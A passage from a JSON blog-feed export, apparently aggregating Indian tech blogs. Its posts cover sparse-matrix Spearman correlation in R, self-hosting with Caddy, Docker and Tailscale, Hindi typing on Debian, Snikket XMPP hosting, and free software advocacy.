naive approach of densifying the matrix\nand calculating correlation using cor(as.matrix(X.sparse), method=\"spearman\"). This in practise defeats the motivation - we are saving memory at the cost of speed.\nSolution \nThe costliest step in my original implementation of SparseSpearmanCor() was a simple lookup operation:\n which(j == column) ,\nwhere I fetch the non-zero entries in a column for calculating the rank, and this happens for all the columns (j stores the index of columns where there are non-zero entries).\nI tried other ways of making this faster, such as by using fastmatch. But the actual\nspeedup came from a simple thought - if we care about the non zero entries, I should just deal with them separately. So instead of doing repeated\nlookups, I just separate the non-zero entries out, do the rank sparsification operations on them and put them back into the sparse matrix. \nI call this implementation SparseSpearmanCor2() and you can find the implementation in the notebook, but here are some comparisons with \nthe dense approach and the previous implementation SparseSpearmanCor().\nThe result is a function that calculates values 10x faster than any approach on large matrices (10000 x 5000):\n  Figure 1. Time benchmarks.\n    \n\n\n\nSparseSpearmanCor2() and time benchmarks are available in this notebook.",[],{"slug":1685,"title":1686,"link":1687,"pubDate":1688,"contentSnippet":1689,"tags":1690,"maintainerName":982,"maintainerUsername":983,"maintainerPhoto":984,"feedUrl":985},"sparsespearman","Memory efficient spearman correlation on sparse matrices","https:\u002F\u002Fsaket-choudhary.me\u002Fblog\u002F2022\u002F03\u002F09\u002Fsparsespearman\u002F","2022-03-08T18:30:00.000Z","An important property of the covariance function is that it is invariant under shifts, i.e.,\nfor any two random variables  X\\mathbf{X}X   and  Y\\mathbf{Y}Y , \nyou get the same covariance if you add constant quantitie to either $X$ or $Y$:\nCov(X+a,Y+b)=Cov(X,Y)\n\\begin{aligned}\n    \\text{Cov}(\\mathbf{X} + a, \\mathbf{Y} + b) &= \\text{Cov}(\\mathbf{X}, \\mathbf{Y})\n\\end{aligned}\nCov(X+a,Y+b)​=Cov(X,Y)​\nwhere  Cov(X,Y)=E[(X−E[X])(X−E[X])]\\text{Cov}(\\mathbf{X}, \\mathbf{Y}) = \\mathbb{E}[(\\mathbf{X} - \\mathbb{E}[\\mathbf{X}])(\\mathbf{X} - \\mathbb{E}[\\mathbf{X}])]Cov(X,Y)=E[(X−E[X])(X−E[X])] \nand  a,ba,ba,b  are real valued quantities.\nEssentially  Cov(X,Y)\\text{Cov}(\\mathbf{X}, \\mathbf{Y})Cov(X,Y)  is a measure of the product of how much $\\mathbf{X}$ and $\\mathbf{Y}$ are deviating\nfrom their respective means so adding a constant does not change anything (because the deviation from the mean remains the same).\nTwo commonly used correlations are pearson  and  spearman . A pearson correlation is essentially a normalized measure of covariance,\nwhich tries to measure how “linearly dependent” are $\\textit{X}$ and $\\textit{Y}$:\nCor(X+a,Y+b)=Cov(X,Y)σXσY,σX2=E[(X−E[X])2),σY2=E[(Y−E[Y])2).\n\\begin{aligned}\n    \\text{Cor}(\\mathbf{X} + a, \\mathbf{Y} + b) &= \\frac{\\text{Cov}(\\mathbf{X}, \\mathbf{Y})}{\\sigma_X \\sigma_Y},\\\\\n    \\sigma^2_X &= \\mathbb{E}[(X-\\mathbb{E}[X])^2),\\\\\n    \\sigma^2_Y &= \\mathbb{E}[(Y-\\mathbb{E}[Y])^2).\\\\\n\\end{aligned}\nCor(X+a,Y+b)σX2​σY2​​=σX​σY​Cov(X,Y)​,=E[(X−E[X])2),=E[(Y−E[Y])2).​\nThe spearman correlation on the other hand asseses if the relationship between $\\textit{X,Y}$ is monotonic (either increasing or decreasing). It is equivalent to running pearson correlation \nbetween the ranks of values in $X$ and $Y$ instead of the actual value themselves. So it essentially asks if $X$ is increasing (decreasing) would values in $Y$ would be increasing (decreasing)\nas well? A perfect score of 1 (-1) would result in a yes (no). Both the types of correlation are often employed in genomics to assess relationship between two variables of interest.\nOne particular context, where correlations are employed is in multi-omics experiments, say where we are profiling RNA and open chromatin regions (ATAC) in the same cells. For example, \na recent study used correlations to find potential gene-enhancer links (Ma et al., 2020). The idea is simple: we have a bunch of cells\nin which we simultaneously profiled both the transcriptome (RNA) and the open chromatin regions (ATAC). We then ask, for each gene, which open chromatin regions are highly correlated (after \nnecessary adjustment for background) to predict potential gene-enhancer links. The default correlation function in R \n cor(RNA, ATAC, method=\"pearson\")  or cor(RNA, ATAC, method=\"spearman\")  would ideally be sufficient to do this.  Here, RNA and ATAC \nare vectors of equal length with entries summarizing the transcriptome signal and ATAC signal at a gene and potential enhancer, respectively.\nHowever, both RNA and ATAC matrices are often sparse matrices, i.e. they have lots of entries that zeroes,\nwhich are not explicitly stored to save space. The default cor() method does not work on sparse matrices. The problem here is a simple one then: convert the RNA and ATAC sparse matrices to a usual (dense) matrix using as.matrix()\nand run the correlation function. However, converting to denser matrix format will take loads of memory, especially if you are searching for link between 10,000 genes and say only about 5,000\npotential enhancers in around 10,000 cells all at once, parallely.\nSparsity makes it easier \nThe solution to avoid this is rather easy and has been previously discussed for pearson correlation.\nA detailed description is available in the documentation of qlcMatrix::corSparse(). \nBut in short, the idea is to utilize the sparsity in a vector and avoid doing operations that would make a sparse matrix dense. For example, the variance calulation for a sparse vect the essential idea here is that we do not want to lose the sparsity\nstructure during our calculations. For example, for a sparse vector, if we are interested in calculating the variance $Var(X) = \\mathbb{E}[(X-\\mathbb{E}[X])^2]$, if we do the $X-\\mathbb{E}[X]$ operation first,\nthe sparsity structure of X is now destroyed and we land up with a dense matrix. Instead, we can use the fact that the variance can equivalentyl be written as $\\text{Var}(X) = \\mathbb{E}[X^2] - E[X]^2$, retaining the sparity\nthroughout. That solves our problem of calculating pearson correlation on sparse vectors (or matrices).\nThe next question is then, what about sparse matrices and spearman correlation? cor(X, Y, kind=\"spearman\")  does not work for sparse matrices and we do not want to convert them to dense form.\nThe solution is again simple, but took me a while to figure out. A naive idea would be to use the definition of spearman correlation - we calculate ranks of $X$ and $Y$ and then run it through cor()\nwith method=\"spearman\" as the ranks are not sparse. The problem however is again the same - the rank matrix is not sparse. But if you think about ranks in a sparse matrix, it does have some\ninteresting properties that we can utilize to make it sparse.\nWe can look at a sparse vector for an example. Consider a vector  y \u003C- c(0,0,0,42,21,10)  with 3 non zero entries. We will use $n_z$ to denote the number of non-zero\nentries in a vector. But if we know the number of non-zero entries, we also know what these ranks are going to be - they are fixed. \nFor a vector with $n_z$ entries, the rank(ties.method=\"average\") method will set them all to $\\frac{1}{n_z}\\sum_{i=1}^{n_z} i = \\frac{(n_z+1)}{2}$. We also know that the lowest non-zero entry in such a vector would have a\nrank of $(n_z+1)$. For example, rank vector  rank(y) = c(2,2,2,6,5,4)  - by default the ranks of tied entries are averaged. So the rank of 0s is $\\frac{1+2+3}{3}= \\frac{(n_z+1)}{2}$. Our rank vector \nis not sparse, but we can retain its sparsity if we were to subtract $\\frac{(n_z+1)}{2}$ from each of the entries. Since a shift operation will not change the (co)variance, the variance of \nc(0,0,0,4,3,2)  which we called the “sparsified rank vector” is the same as original rank vector c(2,2,2,6,5,4). So we should aim to get our “sparsified rank” vector somehow.\nThe trick to arrive at “sparsified rank” vector is to use calculate ranks on the non-zero entries in our vector. We will forget about the zero entries in such a vector and only focus on the non-zero entries - they are few and it is fast to calculate ranks of just these. \nIn this version of the vector (where there are no zeros) the lowest non-zero entry has a rank of $1$ (assuming there are no ties, but the following arguments hold without loss of generality). To arrive at the “sparsified rank” vector,\nwe subtracted $\\frac{(n_z+1)}{2}$ from the original rank vector, so the non-zero entry’s rank will now be $n_z  + 1 - \\frac{(n_z+1)}{2} = 1 + \\frac{n_z}{2} - \\frac{1}{2}$ which is equivalent to adding $\\frac{(n_z-1)}{2}$ to the rank of the \nnon-zero entries! By this way, we retain the sparsity in ranks and can then just use corSparse() to calculate pearson correlation on sparsified rank vectors, resulting in spearman correlation.\nWhile this approach is memory efficient, it unfortunately is not always the fastest. See this notebook for some time benchmarks. I did not explicitly\nperform memory benchmarks.\nUpdate:  The approach is both memory efficient and fast. See an updated post and associated notebook\nExample\n y \u003C- c(0,0,0,42,21,10) \n rank(y) = c(2,2,2,6,5,4) \n sparsified_rank(y) \u003C- c(0,0,0,4,3,2)  (Subtract $\\frac{(n_z+1)}{2}=2$ from all entries to make the previous vector a sparse vector)\n rank(y[y!=0]) = rank(c(42,21,10)) = c(3,2,1) .\nIf we now add $\\frac{(n_z-1)}{2} = \\frac{(3-1)}{2}$ to all the entries of the last vector, we get  c(4,3,2)  which are the non-zero ranks\nfrom our \u003Ccode\u003Csparisifed_rank\u003C\u002Fcode> vector which will be the input to corSparse.",[],{"slug":1692,"title":1693,"link":1694,"pubDate":1695,"contentSnippet":1696,"tags":1697,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-33","shite: static sites from shell (part 1\u002F2) — feeling the html.energy","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fshite-the-static-sites-from-shell-part-1\u002Findex.html","Tue, 08 Mar 2022 00:00:00 +0000","This primer is for people like me, who long dreamed of lovingly hand-crafting our own home on the Internet. We begin our quest by seeing, feeling, and harnessing pure HTML.energy.",[1429,888,1430,533,1397,457,54],{"slug":1699,"title":1700,"link":1701,"pubDate":1702,"contentSnippet":1703,"tags":1704,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"fomo-yamo","FOMO? YAMO.","https:\u002F\u002Fnadh.in\u002Fblog\u002Ffomo-yamo\u002F","Wed, 02 Mar 2022 00:00:00 +0000","A whole new way of seamlessly “hydrating” and building “reactive” webpages, proclaim the dozen new Javascript frameworks that offer slightly different ways of manipulating DOM; new stacks for generating static webpages from templates; new ways of deploying “no-code” apps to “serverless edges”; memory-safe languages that enable error-free programs; NoSQL databases that offer unlimited scalability; CSS frameworks that forever change how webpages are styled; new paradigms of visualizing programs as containers and not processes, container orchestration and not process management; functional programming over imperative over object oriented; “AI\u002FML” for whatever one pleases … magic bullets for everything.",[],{"slug":1706,"title":1707,"link":1708,"pubDate":1709,"contentSnippet":1710,"tags":1711,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"indian-pirates-membership","Announcement: Became a Member of Indian Pirates","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Findian-pirates-membership\u002F","Tue, 01 Mar 2022 00:00:00 +0000","I am happy to announce that I became a permanent member of Indian Pirates a few days ago. Indian Pirates is a decentralized group which aims to be a political party someday and contest elections to form a government. I hope to bring some change politically to improve our lives. The group seeks long term change which means that we are not thinking that we will change the world in day or in one year, but rather understanding the roots of the problems in society and how it is structured and solve the problems by the root itself.\nIt is only an announcement post and I want to keep it short. Good Bye. And see you in the next post.",[],{"slug":1713,"title":1714,"link":1715,"pubDate":1716,"contentSnippet":1717,"tags":1718,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-34","Dismal Arithmetic in Dyalog APL and Clojure","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fdismal-arithmetic-dyalog-apl-clojure\u002Findex.html","Fri, 25 Feb 2022 00:00:00 +0000","Dismal arithmetic is just like the arithmetic you learned in school, only simpler: there are no carries, when you add digits you just take the largest, and when you multiply digits you take the smallest. How does code look in the two languages I like a lot; Clojure and APL?",[52,1719,456,49],"apl",{"slug":1721,"title":1722,"link":1723,"pubDate":1724,"contentSnippet":1725,"tags":1726,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-35","Shell ain't a bad place to FP: part 0\u002FN: Introduction","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fshell-aint-a-bad-place-to-fp-part-0-intro\u002Findex.html","Wed, 23 Feb 2022 00:00:00 +0000","Or, *Supremely Functional Bash Programming*, an exploration in N parts...",[1397,1621,456,530],{"slug":1728,"title":1729,"link":1730,"pubDate":1731,"contentSnippet":1732,"tags":1733,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-36","What makes Functional Programs and Systems \"Functional\"?","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fwhat-makes-functional-programming-systems-functional\u002Findex.html","Tue, 22 Feb 2022 00:00:00 +0000","In which we ponder the Functional Nature of Life, The Universe, and Everything. Please feel free to follow through the weeds, or jump straight to the bottom for my 2 nano BTC on the matter. (Or my current state of mind, at any rate.)",[55,456,530,723],{"slug":1735,"title":1736,"link":1737,"pubDate":1738,"contentSnippet":1739,"tags":1740,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-37","Baby don't hurry, don't stop (feat. Melancholy)","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fdont-hurry-dont-stop-sad-version\u002Findex.html","Mon, 14 Feb 2022 00:00:00 +0000","Here lies melancholy that I put to paper from a particularly deep hole, not too long ago. It may ruin your day, or it may make you feel a little bit understood about your dark moments. Your mileage will vary.",[55,1741],"mentalhealth",{"slug":1743,"title":1744,"link":1745,"pubDate":1746,"contentSnippet":1747,"tags":1748,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-38","people > culture > values > strategy > technology","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fpeople-culture-values-strategy-technology\u002Findex.html","Fri, 11 Feb 2022 00:00:00 +0000","Technology is—and ought to be—the \u002Fbyproduct\u002F of far more important, powerful, and deep-rooted aspects of organisations — including wholesale societies. The pandemic of technology-solutionism gleefully embraced and amplified by all and sundry makes me believe that people seem to have decided it's the other way around.",[50,723,53],{"slug":1750,"title":1751,"link":1752,"pubDate":1753,"contentSnippet":1754,"tags":1755,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-39","Poor man's Reader App with Pandoc & Bash","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Freader-app-pandoc-bash\u002Findex.html","Thu, 10 Feb 2022 00:00:00 +0000","Every so often, I want to avoid opening a website in a browser, for ... reasons.",[456,1397,1621,49],{"slug":1757,"title":1758,"link":1759,"pubDate":1760,"contentSnippet":1761,"tags":1762,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"exposing-services","How I expose services while self hosting","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fexposing-services\u002F","2022-02-10T00:00:00.000Z","I’ve often been asked how to expose public and private services running on DigitalOcean droplets\u002FRPis when self hosting apps. Most people don’t have access to a static IP for their RPis. I felt I’d summarize my approach to this in this blog post and hope it’ll be useful for others trying to do the same.\nTools I use#\nTailscale: I love this and I’ve written about it in the past. I am one of the early adopters, using this for 2 years now and while it can be replaced with other similar Wireguard based mesh services that have popped up recently, I still like the UX of this application a lot. In simpler words, it just works!\nCaddy: I use Caddy as a webserver to host some static websites and as a reverse proxy for all the applications I’ve deployed. It makes the SSL setup a breeze, the config is nice to read as well. There’s nothing about Caddy to not like it if you’re not in the business of dealing with super high concurrent traffic on your website (in which case NGINX\u002FHAProxy\u002FEnvoy et al might be worth looking at). I’ve never used Traefik myself, and while I know it makes the routing simple with Docker labels, I think my current approach with Caddy is also similar and easier for me to use without having to learn a new config.\nDocker: All the services are containerized and I make special use of Docker networks, which I’ll show in the post.\nSetup Overview#\n\nI use 2 instances of Caddy for my setup:\nPublic: This is to reverse proxy all the public-facing websites.\nPrivate: This is to reverse proxy all the internal websites.\nThe docker-compose looks like this:\nversion: \"3.7\"\n\nservices:\n  caddy_public:\n    ...\n    ports:\n      - \"\u003Cdo_floating_ip>:80:80\"\n      - \"\u003Cdo_floating_ip>:443:443\"\n    networks:\n      - public\n    ...\n\n  caddy_internal:\n    ...\n    ports:\n      - \"100.111.91.100:80:80\"\n      - \"100.111.91.100:443:443\"\n    networks:\n      - internal\n    ...\n\nnetworks:\n  public:\n    name: caddy_public\n  internal:\n    name: caddy_internal\nThis is where most of the magic lies. I use 2 Docker networks caddy_public and caddy_internal. Both these networks are configured as Bridge Networks. The containers connected to the same bridge network can even reach other containers using internal DNS.\nThe published port section is the one of importance here.\nIn the internal caddy instance, the TCP port 80 in the container is mapped to port 80 on the Docker host for connections to host IP 100.111.91.100 (this is a private IP and belongs to the CGNAT space). The same is done for caddy_public where instead of Tailscale IP, the Floating IP of the DigitalOcean droplet is used.\nNext comes the part where we’ll attach these networks to our applications. docker-compose by default creates a user-defined bridge network if you leave networks unspecified. However, if you want more granular control, you can specify the networks in the Compose spec itself.\nHere’s an example of Plausible compose spec which is exposed publicly:\n  plausible_events_db:\n    image: yandex\u002Fclickhouse-server:21.3.2.5\n    networks:\n      - plausible\n\n  plausible:\n    image: plausible\u002Fanalytics:latest\n    networks:\n      - web\n      - plausible\n\nnetworks:\n  web:\n    name: caddy_public\n    external: true\n  plausible:\n    name: plausible\nHere you can see that the ClickHouse container is only attached to the plausible network. This plausible network is scoped only to these services defined in this file.\nWe can exec inside the caddy_public container and find out the IP of plausible and verify if the network is correctly configured and reachable:\n$ host plausible\nplausible has address 172.20.0.3\n$ curl plausible:8000\n\u003Chtml>\u003Cbody>You are being \u003Ca href=\"\u002Flogin\">redirected\u003C\u002Fa>.\u003C\u002Fbody>\u003C\u002Fhtml>\u002Fsrv # \nSome notes on this setup:\nYou’ll also note that I haven’t published the port 8000 anywhere. Publishing is only required if you want to forward the traffic from your host network to the docker network (via the bridge). But here, since both are attached to the same network (caddy_public), that is not required anymore.\nThis also means that the only way someone can reach port 8000 on Plausible is only via the Caddy container (which is firewall restricted to Cloudflare IPs.)\nThe DB container doesn’t need to be accessed at all from Caddy, so we’ve not attached the web network there\nHere’s another example of exposing an internal service, which works on the same principles:\n  grafana:\n    image: grafana\u002Fgrafana:8.3.4\n    networks:\n      - monitoring\n      - internal\n\nnetworks:\n  internal:\n    name: caddy_internal\n    external: true\n  monitoring:\n    name: monitoring\nHere, the Grafana container is attached to caddy_internal network. Since the caddy_internal container only publishes ports on the Tailscale IP, anyone who is not inside the Tailscale network will not be able to access this. Tailscale can do much more by setting up ACL rules per device for each user, but since I am the only user, I’ve not configured ACL rules on it yet.\nHope this approach was simplistic enough. I follow this pattern across all the applications I self-host and honestly pretty happy with it\nFin!",[],{"slug":1764,"title":1765,"link":1766,"pubDate":1767,"contentSnippet":1768,"tags":1769,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"hindi-typing-in-debian-based-distros","Hindi typing in Debian-based distros","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fhindi-typing-in-debian-based-distros\u002F","Mon, 07 Feb 2022 00:00:00 +0000","A few days ago, I was contacted by IT for Change to make a video presentation on importance of Free Software in education to teachers in Hindi. When I was making slides in LibreOffice Impress, I saw some problems with Hindi typing. First, I was not able to set the input language to Hindi and second, the fonts in LibreOffice Impress weren’t rendering correctly.\nSo I asked my friend Raghu for help on how to type in Hindi and how to fix the issue, who helped me. I am documenting my findings here for future reference or helping other people.\nI am using PureOS with KDE right now. The same should work in other GNU\u002FLinux distros too, at least in Debian-based ones.\nTo type in Hindi, go to System Settings -> Input Devices -> Keyboard -> Layouts -> Add layout\nTo add the layout, fill the following details:\nLimit selection by language: Any language\nLayout: Indian  (They have written ‘Indian’ as a language, which should be ‘Hindi’)\nVariant: default\nLabel: in\nClick ‘Ok’.\nTip: Ctrl + Alt + K keys is the shortcut for switching the input language.\nThat sets up typing in Hindi.\n\nMapping of inscript Hindi keyboard\n\nNow for the problem of fonts, Raghu suggested me to download fonts-lohit-deva package which downloads Lohit Devanagari font. After downloading, run the command fc-cache -v | grep lohit to see if lohit is there. If it is there, we are good to go.\nIn LibreOffice Impress, I changed the font to ‘Lohit Devanagari’ and the problem got fixed.\nAt last, I made the slides and recorded the video, which you can watch here.",[],{"slug":1771,"title":1772,"link":1773,"pubDate":1774,"contentSnippet":1775,"tags":1776,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-40","How To Be a Totally Natural Conference Speaker?","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fhow-to-give-a-conference-talk\u002Findex.html","Thu, 03 Feb 2022 00:00:00 +0000","Spurred by a conversation with a whip-smart friend and fellow gentlenerd, who unreasonably believed (believes?) they have nothing worth speaking about at the software conferences we like (IN\u002FClojure, FunctionalConf, local meetups etc).",[55,243,1777],"speaking",{"slug":1779,"title":1780,"link":1781,"pubDate":1782,"contentSnippet":1783,"tags":1784,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-41","Reframe Technical Debt as Software Debt. Treat it like a AAA-rated CDO.","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fsoftware-debt\u002Findex.html","Thu, 20 Jan 2022 00:00:00 +0000","I've long struggled with the *Technical* Debt metaphor. It was immediately useful when I first heard it. I still think it is useful, albeit as a starting point. The more I worked with software, the more infuriatingly incomplete it started to feel. So I've reframed it as *Software* Debt, for myself. Here's what I'm thinking.",[1785,1346,1786,723,227,530,53,1787,531,1788],"risk","bias","quality","scale",{"slug":1790,"title":1791,"link":1792,"pubDate":1782,"contentSnippet":1793,"tags":1794,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-42","How To Not Die By A Thousand Cuts. Or, How To Think About Software Quality.","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fhow-to-not-die-by-a-thousand-cuts\u002Findex.html","Not a weighty meandering 300 page Zen dialogue on Motorcycle Maintenance. Merely a meandering blog post in which one contemplates \u002FQuality\u002F of software products.",[1787,1785,723],{"slug":1796,"title":1797,"link":1798,"pubDate":1782,"contentSnippet":1799,"tags":1800,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"snikket-experience","My Experience of running Snikket","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fsnikket-experience\u002F","What is Snikket?\nSnikket is a software that can be installed on a server to self-host an xmpp server. Snikket makes some choices for the person installing it on the server and therefore, makes it easy to get the features any XMPP server would usually like to have– audio\u002Fvideo calls, file sharing, etc. It is very convenient to set up and saves time. The downside is that you lose control over your setup, but you can choose to install plain XMPP on the server anyway if you want more control.\nWhen Praveen told me the idea of Snikket a few days ago, I liked the idea and so I wanted to try and self-host it.\nSetting up on the server\nSahil and I first tried to get Snikket running on a server with nginx running on it, but we failed to do so. Snikket’s guide assumes that there is no reverse proxy running on the server. Then I thought that we should try deploying Snikket on a server in which there is no other service running. Sahil allowed access to a server that he was abandoning anyway. He gave a fresh Debian installed on the server. After that, we followed the Snikket self-hosting guide which was very simple and within a few minutes, the server was up and running.\nExperience as a user\nI created an admin invite link for myself. Then I scanned the QR code in the invite link using the Snikket app. The app asked me to set a username and password, after which my account got created and ready to go. Every user on Snikket needs an invite to join. The admin creates an invite link and shares with the person. The link gives various ways of joining and links to app stores to download the app as well. Then I created an invite link for Sahil. He joined using the Conversations app, which shows that you can use any xmpp app to accept the invite and use your account. we tried texting, file sharing, audio\u002Fvideo calls and it was working very well. Snikket gave 95% compliance to my server out of the box, which usually takes a lot of work in plain XMPP, but Snikket made it easy. On this occassion, the founder of Snikket project, Matt replied to me on Mastodon reminding us not to take compliance measure too seriously:\n\nWhile generating the invite link, the admin can choose the circle of the person they are inviting. People joining the same circle are automatically added as contacts. They don’t need to add manually. For example, you might have a circle called Family. So, everyone in the Family circle will know each other. You might have a different circle called ‘College’ and so on.\nWhat I like about the Snikket is that it is very good quality out of the box. The audio\u002Fvideo call quality is superb, file sharing works like a breeze.\nFurther goals\nThe next step is to configure Snikket on a server running a reverse proxy like nginx. Me and Sahil tried but didn’t get success. If that is successful, I can run the server in long-term. For now, it is only experimental and temporary.\nGoodbye for now.\nUpdate on May 15 2022\nAfter a week of writing this post, I could set up Snikket on nginx. It’s been almost 5 months now and the service is very smooth. I only had to update once and that was very easy. I faced no issues as of now on the server side. The uptime has been 100%.\nI found Snikket project chatroom as very helping and welcoming. They try their best to help newbies in self-hosting, which usually takes a lot of patience.",[],{"slug":1802,"title":1803,"link":1804,"pubDate":1805,"contentSnippet":1806,"tags":1807,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"how-i-got-into-free-software","How I got into Free Software","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fhow-i-got-into-free-software\u002F","Fri, 07 Jan 2022 00:00:00 +0000","Before I forget my journey, I hastily record it here.\nIt is a long series of triggers and questions raised in my mind after I met Richard Stallman in 2016 which were responsible for this.\nI thought on the issues that he raised but didn’t act for years. Occasionally, thoughts about WhatsApp spying on me came to mind. Thoughts about Google recording my whole life. I told one of my friends about Facebook surveillance, and they said they have nothing to hide. Another friend I told about Uber tracking us. Another friend I told about the music app tracking us, and they responded by saying that they used it for their benefit by getting recommendations related to their music taste. All this time, I didn’t think hard enough. I merely knew about tracking, and I gave up my rights in exchange for convenience.\nBut many of the times, there were search results logged by Google which I didn’t want to share with them. The question was what should I do? What should anyone do to browse the web who doesn’t want to sign some arbitrary terms and conditions set up by a company who is not even accountable for their actions. So, I used a proprietary VPN app from the Play Store to “protect” myself. But Google still showed the search results in my profile. Now I really don’t want to tell Google where I am or what I search for, but on the other hand, services like Google search and Google Maps do give convenience. Also, not having a single person sharing this view in my immediate friends circle also discouraged me constantly, even if I wanted to do something about it.\nIn this time period, I also saw some ads by DuckDuckGo on Quora which constantly reminded me about me being pissed off with Google and their surveillance. Thanks, DuckDuckGo :)\nNow, in June 2020, my master’s degree got over, and I got some time to think about the issue. I took the challenge. And as it was, it started with this challenge. I thought switching a little software or using Tor or Brave will give me privacy. I thought I will probably do it in 2-3 days. As it turned out, that thought was really stupid! The so called Dunning-Kruger effect was at work, which says that beginners in a field of study tend to overestimate their knowledge.\nInitially it started as a challenge and not a quest to change the world or anything. Then I stared searching in DuckDuckGo and felt happy about it. It felt cool because nobody I knew had DuckDuckGo as their default search engine. I also used to search Reddit for information on the issue. I came to know about browser fingerprinting technique used by websites like Google to track users. As depressing as it was, using a VPN does not magically make the user invisible and there were so many complexities involved in making decisions on how to be private or anonymous.\nI came across Glenn Greenwald’s book ‘No Place To Hide’ and I read it fully which was about Snowden’s revelations of massive surveillance by NSA. I felt so much for Snowden. His courage also inspired me. He risked his life to tell the world about NSA’s secret spying programs. Whenever I talked to someone about the surveillance, they seemed reluctant to change or even admit that there is some threat. And I thought that this person named Snowden risked his whole life by standing for us against the powerful US Government, but we cannot even compromise on a few conveniences for our privacy.\nI didn’t had a framework to think on how to go about this. I wanted digital privacy but it is a complicated thing. I didn’t even think at that time on a threat model. I also used to think ‘What if the replacement services or software are spying on me?’. How do I verify?\nThis is where I took a page from Richard Stallman’s book, perhaps, I took many pages. It occured to me that ‘if we cannot even inspect what the software does, how can we be sure that the software respects privacy?’ I realized that users do not control a nonfree software. I took some time but I got convinced about the free software being necessary but not sufficient for privacy. So, the replacements I started using, like VLC Media Player or other software, were free software and this was a big difference. Now I had an answer to why use this software and how is it different. At least I was not trusting blindly on the software. I also realized that all the freedoms of free software are important and privacy is not the only issue.\nAt the time, I didn’t had any idea on how to think about messenger apps or search engines or anything server-based which you do not even install in your own computer.\nBy September 2020, I already boycotted most of the software\u002Fservices by Google, Amazon, Microsoft, Facebook and started using Free Software as much as possible. Back then, I had a Macbook so boycotting Apple would take more time. In September 2020, I came to know about FSF India and immediately wrote a volunteer request to FSF India. I wanted to meet like-minded people from India. Till that point, I was doing things all alone, by myself. After a few days, Pirate Praveen replied my volunteer mail. So that is how I joined the community and get in touch with others. I also participated in Software Freedom Camp 2020 where I got to meet more people from the free software movement.\nIn the camp, I met many people. Sahil and Arun were in my group and we had meetings late night to discuss about privacy and teaching each other. In the later stage, I met Akhil, Anupa, Bady, Akshay. And then Karthik who taught some Hugo and command line to me.\nAfter interaction with the community, I realized that centralization of services is another problem and decentralization, federation of services is necessary for user’s freedom, in addition to free software. That enhanced my thinking, and now I could think on ‘Freedom in the cloud’. I also realized how free software community works in practice. Earlier, I only knew the philosophy of free software.\nFast-forward to April 2021, I left FSF India due to their support for Richard Stallman at the event of him being re-elected as a board member of FSF. After that, I focused on campaigning for free software on behalf of Free Software Community of India(FSCI). I became an activist by this time. I think the main reason I became an activist is that you cannot use Free Software or have privacy\u002Fanonymity in isolation. Whatever the majority of people use is usually forced upon the minority. Free Software users who care for philosophy of free software are in minority, and therefore we have to constantly fight, for example, against the social pressure of using WhatsApp. I also realized that the real way to solve the problem is raising awareness on the issue and help people in switching to Free Software. User boycott of nonfree software is a powerful way to defeat the companies who exploit users for using their services.\nNaturally, I wanted to switch to fully free software, which means not using any proprietary software. I bought a Liberated Computer which can run exclusively free software, thanks to Abhas. Abhas also taught me how to install a custom ROM in the phone so that I can get rid of proprietary apps. Now I could do my computing without giving away freedom, which is a unique accomplishment in today’s world. This way I switched to free software and my Macbook passed on to someone else who seems happy to be imprisoned by it(but I am not happy that I did this to someone).\nThanks to all the people who made it possible. First of all, huge thanks to my parents for cooperating (to an extent). Without them supporting me, it wouldn’t have been possible. There are many people who took time and effort to teach me many things. Also, there were already technical solutions for freedom. Free Software movement has existed for long. Thanks to all the people for their contributions to the software I rely on. Thanks to the Free Software Community.\nI would like to take the opportunity to say that we do not really lack in technical solutions for these problems, but rather the willpower of people to use them.\nIn the end, I would like to say that the journey has not ended, it has only started.",[],{"slug":1809,"title":1810,"link":1811,"pubDate":1812,"contentSnippet":1813,"tags":1814,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"quicksy-app","Quicksy: Privacy with convenience","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fquicksy-app\u002F","Fri, 31 Dec 2021 00:00:00 +0000","What is Quicksy?\nQuicksy app logo\n\nQuicksy is a chatting app for Android which is available on Google Play Store and F-Droid.\nQuicksy offers the same convenience, i.e., signup using phone number, as WhatsApp, Telegram and Signal. Signal respects users freedom and privacy, but Quicksy, in addition, is interoperable while Signal is not. iOS does not have Quicksy but Monal or Siskin IM on ioS are compatible with Quicksy.\nHere is a video tutorial to get started with Quicksy.\nWelcome screen of Quicksy app\n\nList of a few features 